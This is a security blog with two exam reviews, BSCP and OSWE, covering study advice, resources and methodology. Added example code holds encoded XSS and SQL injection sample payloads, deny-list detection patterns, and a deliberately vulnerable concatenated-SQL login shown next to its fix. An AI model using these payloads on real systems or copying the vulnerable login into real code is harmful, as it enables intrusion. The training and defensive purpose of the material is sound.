
Mastering Burp Suite: A Journey to Certification and Beyond

28 October 2023 at 23:06

Greetings, everyone! I’m back with the grandest of brooms, ready to sweep away three years’ worth of dust that’s gathered on this aging blog. Over this time, my life has seen significant changes, both personally and professionally. The most remarkable of these changes has been embracing the title of a girl-dad – an experience that has transformed my life in ways I never imagined. As outlandish as some of the rumors may be, I’m here to set the record straight by confirming that the answer to the top three questions people have been asking me is emphatically ‘NO’:   

  1. Did I vanish into a cosmic abyss?
  2. Did I unearth and capitalize on a zero-day exploit, catapulting me into the elite 1%?
  3. Did I amass a fortune in Bitcoin and bask in retirement on the pristine shores of the Cayman Islands?

The purpose of this post is threefold:

  1. To share my personal journey through the Burp Suite Practitioner Certification, offering insights into the challenges and victories I encountered along the way.
  2. To provide valuable resources and tips that were instrumental in my certification journey, aiding others in their quest to pass the exam on their first attempt.
  3. To inspire and encourage fellow cybersecurity enthusiasts to embark on their certification journeys, highlighting the value of accessible labs and the wealth of resources available from trusted authorities in the field.

If you’re already well-prepared, have completed the labs, and are seeking last-minute exam tips, feel free to skip ahead.

Unwrapping the Burp Suite Practitioner Certification

The Burp Suite Certified Practitioner (BSCP) certification, presented by PortSwigger, the creators of Burp Suite, marks a significant milestone in one’s web security career. It demonstrates the ability to identify vulnerabilities, bypass defense mechanisms, and exploit them using Burp Suite. While some lab material delves into extreme depth, PortSwigger’s well-structured learning path and excellent course materials make most topics accessible and engaging. A detailed lab breakdown can be found in the appendix here.

Investing Wisely: Navigating the Cost of Certification

The BSCP certification costs just $99, which may surprise some. This affordability challenges our expectations, especially in a world accustomed to $1,500 courses and expiring lab subscriptions. It’s a psychological shift, and while it might seem cheap, remember that you’ll also need a Burp Pro license, which is mandatory for the exam and currently priced at $449.

Juggling Parenthood and Certification Preparation

The path to certification requires unwavering consistency and willpower. I personally stopped and started my journey multiple times over two years. Acknowledging my lackluster focus, I decided to reset my lab progress in July and start from scratch. As of October 26, 2023, I’ve solved over 200 labs, covering Apprentice and Practitioner levels. The difference this time? I took notes diligently. A valuable lesson: embrace discipline and take notes alongside your hacking journey.

Exam readiness - check!

Cracking the Books: A Deep Dive into the Study Process

I embarked on my journey using Obsidian and Burp, with the ambitious goal of completing an entire topic per day (26 in total). My commitment was to ensure that I never went a day without at least completing some labs or reading material. The key to my success was not overlooking foundational topics. I’ve learned that reinforcing the basics keeps me receptive and offers fresh perspectives.

Decoding the Essentials: A Closer Look at Course Topics

PortSwigger’s materials stand at the top tier when it comes to web application vulnerability resources. They’re free, which is a game-changer. No more scouring the internet and deploying vulnerable apps with no guidance. The labs are a gift, especially if you’ve experienced the frustration of unresolved vulnerabilities and endless PHP exceptions. While some topics may be challenging at first, the satisfaction of grasping something new is unmatched.

Navigating Your Web Application Security Certification Choices

When it comes to web application security certifications, choosing the right path can be a daunting task. The decision should be based on your existing knowledge, career goals, and the level of expertise you wish to achieve. Remember, there’s no one-size-fits-all choice in this journey.

OSWA (Offensive Security Web Application):

  • OSWA claims the top spot due to its foundational and accessible nature, making it an ideal starting point for beginners. This certification provides an essential understanding of web application security, laying a solid groundwork for more advanced certifications. It’s perfect for those new to the field and seeking to build a strong knowledge base.

BSCP (Burp Suite Certified Practitioner):

  • BSCP earns the second place in the ranking for its specific focus on Burp Suite, the most popular web vulnerability scanner and security tool. This certification is valuable for individuals looking to master Burp Suite and enhance their web security assessment skills. It’s a practical choice for those who wish to specialize in this tool and its applications.

eWPTX (eLearnSecurity Web Application Penetration Tester eXtreme):

  • eWPTX secures the third position, offering a comprehensive and in-depth exploration of web application penetration testing. It’s an excellent choice for web security professionals looking to elevate their expertise and gain advanced skills in this domain. eWPTX provides hands-on experience and practical scenarios, making it a valuable certification for those aiming to take their career to the next level.

OSWE (Offensive Security Web Expert):

  • OSWE occupies the fourth rank, signifying its advanced and specialized focus on web application security. This certification is tailored for professionals seeking mastery in advanced web security assessment techniques and defense mechanisms. It’s ideal for those who have already built a strong foundation in web application security and are prepared for the challenges of in-depth expertise in the field.

The Path to Success: Navigating the Exam Journey

To register for the exam, you must complete at least one Practitioner-level lab from each topic, five mystery labs, and one practice exam. Mystery labs challenge you to identify vulnerabilities without explicit objectives. During the exam, you’ll need to compromise two applications within a four-hour window, moving from an anonymous user to an administrative user, and eventually gaining Remote Code Execution (RCE) to retrieve a secret file. The logistics are straightforward, but be prepared to start the exam from a Windows machine, even though you can complete it on your Kali box. You can read the official instructions here.

Acing the Exam: Strategies for Passing on Your First Attempt

First and foremost, dismiss the notion that you have to fail on your first try. The sentiment of preparing to fail on the first attempt is pervasive but not necessary.

Understanding Exam Dynamics:

  • Mastery of the exam dynamics is crucial: the rules for completing each application guide you through discrete steps.
  • This knowledge is a significant advantage, allowing you to isolate specific topics for different phases of the exam.
  • For instance, you’re unlikely to encounter SQL injection or command injection when attempting to gain initial access; instead, client-side attacks to access a user’s session are more common.
  • Credit to @botesjuan, who I believe is the original creator of the commonly shared image below.
    Exploit breakdown per exam phase

Master Client-Side Delivery With The Exploit Server:

  • The effective use of the exploit server is paramount to your success. Even if you’re highly experienced, meeting only the bare minimum requirements for the exam often leads to failure.
  • Relying solely on one Practitioner lab per topic doesn’t adequately prepare you for the exam’s mechanics.

Weaponize Your Client-Side Payloads

  • Avoid regarding your alert() pop-up as the ultimate solution in the labs; it’s insufficient in the exam. Instead, understand in each instance how you can exfiltrate cookies through your Collaborator or exploit server.
  • In many labs, you’ll achieve this using an iframe, but be prepared for unexpected challenges. For example, some vulnerable pages may set an X-Frame-Options header that blocks iframes.
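To know ahead of time whether the X-Frame-Options caveat above applies to a page, check the response headers rather than discovering it when the frame stays blank. The following is an added example, not code from the post or from PortSwigger: it evaluates the two headers that govern framing, Content-Security-Policy frame-ancestors and the older X-Frame-Options, for a given framing origin. Header semantics follow the standards; the sample responses, origins and function names are constructed for illustration.

```python
"""Will a page load inside an iframe served from a given origin?

Added example, not from the original post: it evaluates the two response
headers that control framing, Content-Security-Policy frame-ancestors and the
older X-Frame-Options, over constructed header sets so you can tell in advance
whether a frame-based check will be blocked. When both headers are present,
browsers honour frame-ancestors and ignore X-Frame-Options.
"""
from urllib.parse import urlsplit


def _origin(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def _matches_source(source: str, framer: str, page: str) -> bool:
    """Match one frame-ancestors source expression against the framing origin."""
    source = source.strip().strip("'").lower()
    fp = urlsplit(framer)
    framer_host = (fp.hostname or "").lower()
    if source == "none":
        return False
    if source == "self":
        return _origin(framer) == _origin(page)
    if source == "*":
        return True
    if source.endswith(":") and "/" not in source:      # scheme-source, e.g. https:
        return fp.scheme.lower() == source[:-1]
    scheme, _, host = source.rpartition("://")          # host-source, optional scheme
    host = host.split("/", 1)[0].split(":", 1)[0]       # drop path and port
    if scheme and scheme != fp.scheme.lower():
        return False
    if host.startswith("*."):                           # wildcard subdomains
        return framer_host.endswith(host[1:])
    return framer_host == host


def framing_allowed(headers: dict, framer_origin: str, page_url: str):
    """Return (allowed, reason) for embedding page_url in a frame served from framer_origin."""
    lower = {k.lower(): v for k, v in headers.items()}
    for directive in lower.get("content-security-policy", "").split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            sources = tokens[1:]                        # an empty list means 'none'
            allowed = any(_matches_source(s, framer_origin, page_url) for s in sources)
            return allowed, "CSP frame-ancestors " + " ".join(sources)
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False, "X-Frame-Options: DENY"
    if xfo == "SAMEORIGIN":
        return _origin(framer_origin) == _origin(page_url), "X-Frame-Options: SAMEORIGIN"
    if xfo:
        # ALLOW-FROM and misspelt values are ignored by current browsers, so they protect nothing.
        return True, f"X-Frame-Options: {xfo} (not enforced by modern browsers)"
    return True, "no framing protection"


# Constructed sample response headers; not captured from any real application.
SAMPLES = {
    "legacy-deny": {"X-Frame-Options": "DENY"},
    "same-origin-only": {"X-Frame-Options": "SAMEORIGIN"},
    "csp-self": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp-partner": {"Content-Security-Policy": "frame-ancestors https://partner.example"},
    "csp-wins-over-xfo": {"X-Frame-Options": "DENY",
                          "Content-Security-Policy": "frame-ancestors https://partner.example"},
    "unprotected": {"Content-Type": "text/html"},
}


def audit(framer="https://partner.example", page="https://app.example/account"):
    """Map each sample to whether `framer` may embed `page`."""
    return {name: framing_allowed(h, framer, page)[0] for name, h in SAMPLES.items()}


if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        ok, why = framing_allowed(hdrs, "https://partner.example", "https://app.example/account")
        print(f"{name:18} {'allowed' if ok else 'blocked':7}  {why}")
```

The "csp-wins-over-xfo" sample is the case worth remembering: a DENY in X-Frame-Options tells you nothing once a frame-ancestors directive is present, because the browser only consults the CSP.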

Complete All Practitioner Labs:

  • Completing all Practitioner-level labs is essential, primarily for the sake of familiarity. The exam follows a similar structure to the labs, making your experience invaluable.
  • With enough practice, you’ll develop an intuitive sense and a mental checklist of potential vulnerabilities to look for.

Utilize Common Obfuscation and Encoding Techniques:

  • While labs may not require you to bypass web application firewalls (WAFs), the exam certainly does. Don’t underestimate the importance of obfuscation and encoding techniques.
  • Falling short in this area during the exam can lead to pitfalls, so be well-prepared.
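The server-side reason these encoding tricks work is that a filter inspecting the raw request string does not see the same bytes the application later decodes. The following added example (not code from the post or from PortSwigger) runs a small deny-list over a set of inputs twice, once on the raw string and once after decoding it to a fixed point, so the gap is visible. The pattern list, decoders and sample inputs are constructed for the example.

```python
"""Canonicalise user input before inspecting it.

Added example, not code from the post or from PortSwigger. A deny-list filter
run over the raw request string misses a payload as soon as it is URL-encoded,
double-encoded, HTML-entity-encoded or written with JavaScript \\uXXXX escapes;
the same filter run after decoding to a fixed point catches every variant.
Pattern list, decoders and sample inputs are constructed for illustration.
"""
import html
import re
from urllib.parse import unquote

# Deliberately tiny deny-list; real detection rules are far broader.
SUSPICIOUS = [
    re.compile(r"<\s*script\b", re.I),                 # script tag
    re.compile(r"\bon[a-z]+\s*=", re.I),               # inline event handler attribute
    re.compile(r"\bunion\b[\s/*]+\bselect\b", re.I),   # UNION SELECT, incl. /**/ spacing
]


def _decode_js_escapes(s: str) -> str:
    """Turn \\uXXXX and \\xXX escapes into the characters they denote."""
    s = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def canonicalise(value: str, max_rounds: int = 5) -> str:
    """Apply every decoder repeatedly until the string stops changing."""
    for _ in range(max_rounds):
        decoded = _decode_js_escapes(html.unescape(unquote(value)))
        if decoded == value:
            break
        value = decoded
    return value


def inspect(value: str) -> tuple:
    """Return (flagged_on_raw_input, flagged_after_canonicalising)."""
    raw = any(p.search(value) for p in SUSPICIOUS)
    canon = any(p.search(canonicalise(value)) for p in SUSPICIOUS)
    return raw, canon


# Constructed sample inputs: the same two payloads in several encodings, plus benign text.
SAMPLES = [
    "<script>alert(1)</script>",
    "%3Cscript%3Ealert(1)%3C/script%3E",        # URL-encoded
    "%253Cscript%253E",                          # double URL-encoded
    "&lt;script&gt;",                            # HTML entities
    "\\u003cscript\\u003e",                      # JavaScript unicode escapes
    "1 UNION/**/SELECT 1",
    "1%20UNION%20SELECT%20password%20FROM%20users",
    "plain search text",
]


def audit(samples=SAMPLES) -> dict:
    """Map each sample to its (raw, canonical) verdict pair."""
    return {s: inspect(s) for s in samples}


if __name__ == "__main__":
    for sample, (raw, canon) in audit().items():
        print(f"{sample!r:50} raw={raw!s:5} canonical={canon}")
```

Decoding to a fixed point (rather than once) is what handles the double-encoded sample; capping the rounds keeps a pathological input from turning the filter into a CPU sink.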

Compile Proof-of-Concept (POC) Code:

  • It’s a recipe for disaster to rely solely on grabbing solutions from the lab materials during the exam, especially when you have only 40 minutes per vulnerability.
  • Ensure you have POC code readily available for each potential vulnerability you may encounter.

Perform Targeted Scanning, Don’t Rely On It

  • While targeted scanning is a valuable skill, it’s unwise to solely depend on it to solve the exam. The ability to actively scan the webroot and resolve the exam isn’t guaranteed.
  • Consider learning targeted scanning as an additional tool in your toolkit; it may prove useful in certain scenarios.

Value PortSwigger’s Hints:

  • Don’t overlook the hints provided by PortSwigger themselves. These hints can provide critical guidance and insights, potentially making your exam experience smoother and more successful.

Rich Resources: Your Ultimate Toolkit

A big shout-out to the authors of the following content, which proved immensely valuable during my journey. If you aim to pass the exam on your first attempt, bookmark these resources and know them inside and out.

Unlocking Wisdom: Blogs for your Journey

  1. https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
  2. https://github.com/DingyShark/BurpSuiteCertifiedPractitioner
  3. https://github.com/Zoltan3422/portswigger-guide
  4. https://micahvandeusen.com/burp-suite-certified-practitioner-exam-review/
  5. https://bscpcheatsheet.gitbook.io/exam/
  6. https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/
  7. https://sc.scomurr.com/http-request-smuggling-web-cache-poisoning/

YouTube Guides: Navigating the World of Burp Suite

  1. https://www.youtube.com/@RanaKhalil101/videos
  2. https://www.youtube.com/@intigriti/videos
  3. https://www.youtube.com/watch?v=yC0F05oggTE
  4. https://www.youtube.com/@z3nsh3ll

Burp Plugin Power: Enhancing Your Toolkit:

  1. DOM Invader
  2. Param Miner
  3. Hackvertor
  4. Deserialization Scanner
  5. HTTP Request Smuggler

The Final Verdict on the Burp Suite Practitioner Certification

Through this incredible journey, I’ve ventured into unfamiliar territories while strengthening my knowledge in familiar ones. The accessible labs have proven invaluable, offering a wealth of resources to all, even those who might not be interested in certification.

I want to underscore that if I can persevere through this certification journey with a newborn by my side, anyone with the motivation, focus, and determination can do it too. This certification offers a path to expertise in web security, a field where knowledge is power. So, dive in, make use of the resources I’ve shared, and indulge in your favorite topics. The journey is challenging, but the destination is worth every effort. Until next time, stay inspired and stay secure.

Appendix

My Favorite Topics

  • Prototype Pollution
  • HTTP Request Smuggling
  • Race Conditions

Lab Breakdown

Topic               | Apprentice labs | Practitioner labs | Expert labs
SQLi                | 2               | 16                | 0
XSS                 | 9               | 15                | 6
CSRF                | 1               | 11                | 0
Clickjacking        | 3               | 2                 | 0
DOM-Based           | 0               | 5                 | 2
CORS                | 2               | 1                 | 1
XXE                 | 2               | 5                 | 1
SSRF                | 2               | 3                 | 2
Request Smuggling   | 0               | 15                | 7
Command Injection   | 1               | 4                 | 0
SSTI                | 0               | 5                 | 2
Path Traversal      | 1               | 5                 | 0
Access Control      | 9               | 4                 | 0
Authentication      | 3               | 9                 | 2
WebSockets          | 1               | 2                 | 0
Cache Poisoning     | 0               | 9                 | 4
Deserialization     | 1               | 5                 | 3
Info Disclosure     | 4               | 1                 | 0
Business Logic      | 4               | 7                 | 0
Host Header         | 2               | 4                 | 1
OAuth               | 1               | 4                 | 1
File Upload         | 2               | 4                 | 1
JWT                 | 2               | 4                 | 2
Prototype Pollution | 0               | 9                 | 1
GraphQL             | 1               | 4                 | 0
Race Conditions     | 1               | 4                 | 1
NoSQL               | 2               | 2                 | 0

The post Mastering Burp Suite: A Journey to Certification and Beyond appeared first on Certification Chronicles.

OSWE Review (AWAE Course)

1 November 2020 at 19:09

Introduction

Once again I am victorious! Being completely transparent, passing that exam was hard – there were periods that totally made me doubt myself. During these times all the blogs you’ve read about people failing multiple times begin to resonate with you. Thoughts such as “who the hell do I think I am to not experience the same” start to creep up. Many people assume that since I have a number of certificates the process is somewhat trivial, or that I’m some super smart genius. That is 100% false. It’s a grind, a fight and a constant mental battle. The only difference for me is that I have been through so many battles that I can more easily block out the noise, not let it totally consume me, and rely on previous successes for confidence. This still takes effort though.

Before we start, there is no way I can provide better information on how to pass the exam than what’s already publicly available. That’s all included in the bookmark section. If you don’t care about the journey, feel free to skip to the exam & methodology sections. I never try to give the best, because best is subjective, relative and in most aspects I’m still a student. I attempt to provide what I felt was missing from most blogs I read when attempting to study: the context – the thoughts, feelings, emotions and situational metadata most authors never include. So let’s begin with that.

Mindset 💡

I never pursue certificates for job promotion, advancement or anything besides enhancing my personal knowledge. Therefore there’s never any pressure on me, besides the kind that’s self-injected. It’s all for the love of learning security and its related disciplines. So if you’re the type who brute-forces exams and doesn’t really care about the knowledge gain, you’re probably not going to like it here. You’ll get (some) technical details, sure, but it won’t be an exam-dump thanks-goodbye post. That’s not the point. There’s nothing wrong with trying to put yourself in a better position, but you should be driven solely by passion. That behavior waters our field down – you’ll meet folks with certificates abc-xyz who can’t think or speak beyond basics. To each their own.

Why Go After OSWE

What makes a man go after any certificate? 🤣 It seemed like beautiful pain. I hope no one has forgotten that I obtained CISSP at the beginning of the year, and the Certified Cloud Practitioner, Certified Solutions Architect, and Security Specialty AWS certificates towards the beginning of the summer. I didn’t plan on any of this; I just identify areas where I’m weak and find the best certificates to try to bridge the gap. I couldn’t take it anymore in June, after aimlessly doing nothing for a whole week. I justified purchasing a new course as a birthday gift to myself 😂 how pitiful, I know.

I don’t perform any exploit development, penetration testing or malware reversing for work (90% of this blog). I learn them for fun and to understand the more difficult domains of security. Work is mainly Application Security – so this was one of the rare times I found a certificate that actually aligned directly with what I do day-to-day. That’s not to say that those topics don’t contribute to me having a more intimate comprehensive understanding of security because they do.

I knew the course was mainly source-code review. I thought this was AWESOME since there aren’t many white-box based courses vs. the 1-million black-box counterparts. I figured because of this a large majority of folks would wash this course and certificate down the drain. Folks want to use their tools and get root 👌 If you’re a security professional and you run from source code, I can’t take you seriously. If you can only leverage tools written by others and not develop your own, you’re going to severely limit yourself. That’s one thing, maybe more important for web application security professionals: the vulnerabilities occur in the source code, they just manifest themselves in the applications, and the exploits that take advantage of the vulnerabilities need to be developed in some source language. The point is we all need to be comfortable and at home at the source level. We’re more valuable to our teams, developers and the organizations we defend.

Signing Up

You need to register for the course well before you anticipate starting. The slots fill up pretty fast. The same goes for registering for the exam. I registered on June 29th and the first available lab date was July 11th, which I accepted and anxiously awaited. I decided on 90 days of lab time; since I had already done the other certificates, I planned to slow-roll this one and, if possible, pass the exam by the end of the year.

The Lab

If you are not familiar with Offensive Security courses: at the exact time your lab is set to begin you’ll receive an email with your VPN credentials, course PDF, and a link to download the videos that go alongside the PDF. Some people are religious about the order in which they prepare, whether it’s video first or PDF first. Personally, I watch the videos for the entire module once and then replicate using the PDF as reference, if needed, since the videos tend to be more verbose.

Along with the materials, once connected to the VPN you get your Control Panel to revert machines. Unique to this course, you’re provided with a wiki. It contains the list of machines in your lab, their IP addresses and credentials. In addition to that you’re provided with skeleton code for most of the exploits throughout the different modules. Thanks, OffSec! I would recommend you write it all out by hand and never touch these.

I start the lab and 5 days later guess what? The course gets updated! I get an additional 30 days of lab time for free. Talk about positive vibes!

Prior To Upgrade

The PDF was 267 pages and, with the videos, covered 6 modules.

After The Upgrade

The bulked-up PDF was now 412 pages and included the original 6 modules, 3 additional lab machines with more modern vulnerabilities and exploitation techniques, and 3 machines with no solution, provided purely for exam preparation. Of the 3 new lab machines, 2 were white-box and 1 was black-box. That’s slightly incredible: receiving seemingly 50% more content essentially on the house. I welcomed it with open arms.

Throughout the lab you’ll become one with all sorts of SQLi – union-based, time-based, boolean-based, MySQL flavor, Postgres flavor. Authentication bypasses using session hijacking & session riding will become natural, as will XXE, SSTI, deserialization, file upload bypasses and others. You’ll find a variety of languages including Java, PHP, Node.js, Python, C# and web frameworks to analyze and get comfortable with. For the compiled languages you’ll learn techniques to recover the original source code. They’ll drill the importance of database query logging and how to set it up with the many databases throughout the course.

The difference in this course is the perspective and mindset with which you approach finding the vulnerabilities. They’re all impossible to discover purely from a black-box perspective; you won’t be throwing a vulnerability scanner at any of these boxes to find anything, and sqlmap will not work (not allowed in the exam anyway)! Run nikto, gobuster (or any other Kali tool) if you want, but it’s useless. You need a healthy combination of brainwork and understanding sources to sinks, routes and controllers. Become comfortable understanding code flow, and lots of it. Even following the lab guide and videos, there are still modules that take multiple days to grasp and over a week to replicate. It’s a marathon, not a sprint.

Losing Steam and Yolo’ing It

I was super motivated initially (month 1), putting in like 3-4 hours on weekdays and 8+ on weekends. Life happens and you naturally start to lose steam. That’s why I typically troll Reddit for Discord groups with others studying for the same or similar certificates. You’re not always going to be motivated, and having others locked in keeps you accountable and in the game. There will always be folks to bounce ideas off of, rant and cry to. Probably the most special part is just having friends across the globe who love the same thing as you. Once you have enough friends it’ll be impossible to slack, because you’ll have friends in all time zones during breakfast, lunch, dinner and while you sleep to exchange knowledge with. Greetz to all my boys in the Discord server mentioned below.

Towards the beginning of October (month 3) I found myself skipping the lab completely for 3-4 days at a time. It was easier to say whatever. My original exam date was October 30th, and I felt like this exam was consuming me way too much and I had been in the lab for way too long. I developed my methodology discussed below and rescheduled the exam for a week earlier, 10/24 at 10:00 EST.

I had completed the entire lab twice (excluding the 1 black-box machine from the updated materials). I honestly watched the videos 3 times and still didn’t really grasp how I would have been able to achieve such madness start to finish, and wrote it off as not needed. The 2nd time through the lab I took detailed notes – what were the high-level steps to achieve authentication bypasses, what did I exploit to get RCEs, what was the syntax of the commands I used, what did I screw up on or miss that I should be on the lookout for if I come across a similar situation. Lots of times I make snarky comments reminding myself how much of an idiot I am. It helps make things stick.

2 Weeks Before Exam

During the last 2 weeks I decided to give the 3 boxes without solutions a shot. It was a fight (struggle) but I managed to get RCE on both in maybe a week and a half. I can remember going an entire weekend stuck and making no progress on one. Those were hard, but it’s a shift in your mindset. You gain this fake confidence in the lab since you can simply look at the PDF & videos and say to yourself, “I knew that” or “I would have been able to figure that out”. With no solutions you are on your own and at the mercy of your own brain. Again, like the black-box from the lab, the black-box with no solutions was a brain fu*k. I got the authentication bypass but didn’t want to waste my remaining time on an exam for source-code review worrying about wicked black-box exploits. Not sure why they included these – I guess it’s to supplement those who don’t have experience analyzing from a black-box perspective, since in white-box you tend to leverage both. You see an input field or parameter that looks suspicious, find the method in the source code responsible for processing that input, then follow it to see if it’s sanitized or used in an unsafe way. If those black-box boxes (say that a few times fast) don’t make you sweat – you’re much more 1337 than I am!

Enter The Exam

I have been working on my zen a bunch lately. I spend absolutely zero energy on events I can’t control (weather, politics, someone’s thoughts of me, etc.). I spend the majority of my energy on things I have full control of (thoughts, discipline, being thankful, positive outlook). Finally there are things that I don’t control fully but have some control of (certification exams). For these I shift my goal not to passing but to giving my absolute max and trying my best; if I come up short I still achieve my goal. This reduces negative emotions like anxiety and regret.

So it is the Friday evening before the exam and I’m pumped. I’m excited to have a chance to perform. I really only judge myself when I’m facing challenging situations. It’s when your back is against the wall that your resiliency is determined, not when things are rosy. I’m a little nervous about the unknown, the shock factor. My only hope was that when I gained access to the exam it didn’t feel like I had been studying for a different certification.

Day 1 – 04:30 a.m. – I get out of bed since my mind has been racing for half an hour already. I watched the lab videos of exercises I thought were relevant, ensured my notes were organized once more and wrote myself some positive notes in size 50 bold font. The time was dragging but I used it wisely. My fear at this point is that I’m going to get sleepy during the day since I woke up so early, but so be it.

Day 1 – 09:45 a.m. – I sign into the proctoring software, verify my credentials, display my workspace, and share my screens. I can’t provide specific details here, but after connecting to the exam VPN I was provided 2 web applications and their source code. The Control Panel provided details and instructions on how to access each, the point breakdown and what constituted successful compromise. The proctor has no audio; you’re able to communicate with them via chat and your webcam is on at all times. I had been through the exam guide and proctoring manual maybe 15 times before this moment. You definitely don’t want to have IT issues the day of your exam.

Box-1 Start

Day 1 – 10:00 a.m. – I’m off to the races. I went to the homepage of the first application to see what type of application it was, then directly to the source code. My brain is firing on all cylinders but there’s a LOT of code. Connect the dots. I got the authentication bypass at 18:53. At this point I’m thinking, “Damn, I might fail this based off running out of time”.

Box-1 Authentication Bypass Complete (8 hours 53 minutes)

Did I mention I had PRK eye surgery a week before the exam? It’s like the precursor to LASIK but more stable and permanent. This is significant since folks typically want to know how often you took breaks. I was taking medicated eye drops every 4 hours and rewetting drops every hour, and every half hour I’d have to look away for at least a minute to focus on objects far away so I didn’t hurt the recovery of my eyes. In the time it took to get the first authentication bypass I took one 30-minute break to eat.

Day 1 – 10:00 p.m. – Things are hazy and waking up so early is beating me up right now. I know exactly what I have to do and I’m trying, but it just won’t work. I’m making stupid scripting mistakes and wasting time on silly things because I’m tired. I take a small break and promise myself I will go to sleep if I can get the RCE.

Day 2 – 12:00 a.m. – I get the RCE and fulfill my promise. I feel okay now since I think I started with the tougher application, and it took me around 14 hours start to finish. Off to sleep.

Box-1 RCE Complete (14 hours 15 minutes)
Box-2 Start

Day 2 – 04:00 a.m. – What is up with me and 4 a.m.? Anyway, those 4 hours felt marvelous and I felt like a tiger waking up! Very motivated. I put on the tea kettle to make myself some ginger tea, notify the proctor I’m back, sit back down and lock back in.

Box-2 Authentication Bypass Complete (29 hours 53 minutes)

Day 2 – 2:23 p.m. – I noticed the authentication bypass for this one in less than half an hour. Noticing it and pwning it are totally distinct things. I got the authentication bypass at 14:23. Yes. Imagine knowing what to do and it taking 9-10 hours. The good thing about the second box was that I discovered the RCE while doing reconnaissance for the authentication bypass.

Box-2 RCE Complete (33 hours)

Day 2 – 05:00 p.m. – RCE done! Although I have all the points now, I also have a very important upcoming week at work, and although I could wait until tomorrow (Monday) after work to write the report, my exam time expires at 10 a.m. Monday. I take a break, eat dinner and start to write the report.

Writing The Report

Day 2 – 7:00 p.m. – I had been taking screenshots throughout, but I noticed how much I hadn’t grabbed when I started to go through the sections of Offensive Security’s exam template. TRUST ME .. TRUST ME, you do not want to get lazy on the report after you’ve done the exam, because they will fail you without hesitation! There are plenty of horror stories. Being a former penetration tester who has gone through a couple of Offensive Security certificates before, I understand the level of granularity they expect you to provide.

Along with the proofs and screenshots you should include your methodology to achieve compromise along with your attack code. I provided everything: what I was thinking, vulnerable methods, pitfalls, and all the other (relevant) things firing off in your brain during a 48-hour exam.

Day 3 – 12:00 a.m. – I proofread the report with glossy eyes 4 times and completed the process of uploading the exam reports. After I got the confirmation email I went to bed.

I had to wait an entire 5 days from Sunday night -> Friday to receive my results that I had achieved the OSWE certification 👏🏽

Exam Methodology

Everything I’m about to mention is taught and reiterated throughout the course. What’s the point? During the exam you’ll need to absorb and internalize tons of new information. A methodology is a general approach that you can refer to when you hit a snag.

If you don’t know how to debug you are dead. You cannot pass without understanding how to debug properly. In interpreted languages that means adding print statements; in compiled languages it means actually stepping over/into methods and examining objects, properties and values. Leverage all the techniques taught throughout the course.

General

  • Examine unauthenticated areas of the source-code first
  • Leverage the Visual Studio Code Remote SSH extension
    • Understand the launch.json files in Visual Studio Code
  • Examine the routes to see all the endpoints. Understand the authorization applied to each
  • Review the controllers to understand how user input is handled by the application
  • If possible, always enable database query logging
  • dnSpy to decompile .NET, JD-GUI for Java
  • After checking unauthenticated areas, focus on areas of the application that are likely to receive less attention
  • Investigate how sanitization of user input is performed. Is it done using a trusted, open-source library, or is a custom solution in place?
  • When auditing, realize which code you can reach regardless of conditionals and loops

Potential Authentication Bypass Techniques

  • SQLi
    • Can we create a user account
    • Can we leak hashed passwords, reset tokens and other information to aid in authentication bypass
  • Broken Authentication
    • Does authentication depend on private information that we can leak from DB using above
  • Regular – Time Based – Boolean Based (examples and templates for each)
  • PHP Type Juggling
  • Reading Arbitrary Files w/ XXE
  • XSS -> CSRF (Session Hijacking or Session Riding)
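The first technique on the list above, SQLi as an authentication bypass, is the kind of defect a white-box review finds by reading the login controller rather than by probing the form. The following added example, not code from the post or the AWAE course, shows the same login check twice: a query assembled by string concatenation, where a comment-terminated username removes the password clause, and the parameterised version, where the identical input is just a username that does not exist. It also switches on statement logging, the SQLite counterpart of the database query logging the General section recommends, so the statement the database actually executed is visible. SQLite is used so the example runs offline (the labs use MySQL and PostgreSQL); the account, hash scheme and function names are constructed.

```python
"""Login check built by string concatenation vs. a parameterised one.

Added example, not code from the post or the course. An in-memory SQLite
database (the labs use MySQL and PostgreSQL; SQLite keeps this offline) holds
one constructed user, and the same login logic appears twice: the
splice-the-input-into-SQL form a white-box review is hunting for, and the
fixed form. Statement logging is on, the SQLite counterpart of the query
logging the course has you enable, so each executed statement is recorded.
"""
import hashlib
import hmac
import sqlite3


def make_db(query_log: list) -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.set_trace_callback(query_log.append)      # record every executed statement
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    # Constructed sample account. SHA-256 keeps the example short; a real
    # application would use a slow password hash such as bcrypt or Argon2.
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.sha256(b"correct horse").hexdigest()))
    conn.commit()
    return conn


def _digest(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def login_vulnerable(conn, username: str, password: str):
    """The user-controlled string becomes part of the SQL text itself."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND pw_hash = '" + _digest(password) + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(conn, username: str, password: str):
    """Bound parameter for the lookup, constant-time comparison for the hash."""
    row = conn.execute("SELECT pw_hash FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return None
    return username if hmac.compare_digest(row[0], _digest(password)) else None


def demo() -> dict:
    """Run both versions with valid credentials and with a comment-terminated username."""
    log = []
    conn = make_db(log)
    crafted = "admin' --"   # constructed: the trailing SQL comment removes the password clause
    results = {
        "vulnerable_valid": login_vulnerable(conn, "admin", "correct horse"),
        "vulnerable_crafted": login_vulnerable(conn, crafted, "not the password"),
        "fixed_valid": login_fixed(conn, "admin", "correct horse"),
        "fixed_crafted": login_fixed(conn, crafted, "not the password"),
    }
    results["executed_statements"] = list(log)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Reading the logged statements is the point of enabling query logging during review: the vulnerable path shows the comment sitting inside the executed SQL, while the fixed path always executes the same statement text regardless of input.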

